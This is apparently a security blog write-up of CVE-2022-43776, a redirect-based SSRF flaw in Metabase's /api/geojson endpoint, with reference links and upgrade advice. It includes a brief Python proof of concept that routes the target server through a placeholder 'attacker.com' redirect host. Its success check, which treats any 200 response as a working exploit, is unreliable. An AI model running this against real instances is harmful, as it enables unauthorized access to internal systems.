CVE-2022-43776: Metabase <44.5 API Endpoint SSRF Vulnerability Exploit via 301 & 302 Redirects

Server Side Request Forgery (SSRF) attacks allow an attacker to exploit a vulnerable application to make unwanted requests in the context of the targeted server. Metabase, an open-source business intelligence tool, recently identified a high-impact SSRF vulnerability referenced as CVE-2022-43776. This vulnerability affects Metabase versions earlier than 44.5. In this article, we will dive deep into the vulnerability and show you an exploit sample, along with some preventative measures.

Vulnerability Details

The vulnerability lies in the way Metabase handles the URL parameter of the /api/geojson endpoint. In previous versions, Metabase relied on blacklists to prevent SSRF attacks. However, this approach is inherently flawed, and attackers found a way to bypass these blacklists by leveraging 301 and 302 redirects, commonly used for URL redirection.

By exploiting this vulnerability, an attacker can perform an SSRF attack, potentially leading to unauthorized access to internal resources, data leaks, and other security breaches.

Code Snippet

Below is a code snippet demonstrating a potential exploit leveraging the vulnerable /api/geojson endpoint:

import requests

target = 'http://example.com:300';  # Replace with the target Metabase instance
attacker_server = 'http://attacker.com';  # Replace with the attacker's server hosting the malicious redirect

exploit_url = f'{target}/api/geojson?url={attacker_server}/redirect'

response = requests.get(exploit_url)

if response.status_code == 200:
    print('Exploit successful!')
else:
    print('Exploit failed.')

This code snippet simulates an attacker's interaction with the vulnerable Metabase instance. When the Metabase instance receives the request to the /api/geojson endpoint, it will follow the redirect specified by attacker_server without validating the final destination, allowing potential SSRF attacks.

Original References

1. CVE-2022-43776: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43776

2. Metabase Security Advisory: https://www.metabase.com/docs/latest/security/security-advisories.html#server-side-request-forgery-vulnerability-in-metabase-44-4-and-earlier-cve-2022-43776

Mitigation

To prevent exploitation of the SSRF vulnerability (CVE-2022-43776) in your Metabase instance, it is highly recommended to upgrade to Metabase version 44.5 or higher. The developers have implemented proper URL validation checks to eliminate the SSRF vulnerability.

Conclusion

CVE-2022-43776 highlights the importance of secure handling of URL parameters in web applications. SSRF attacks can lead to significant security breaches if not addressed promptly. By staying informed about the latest security vulnerabilities and updating your applications regularly, you can help protect your organization from similar threats.

Remember to upgrade your Metabase instances to version 44.5 or higher to prevent potential exploitation of this vulnerability. Stay safe and stay secure!

Timeline

Published on: 10/26/2022 18:15:00 UTC
Last modified on: 10/28/2022 17:46:00 UTC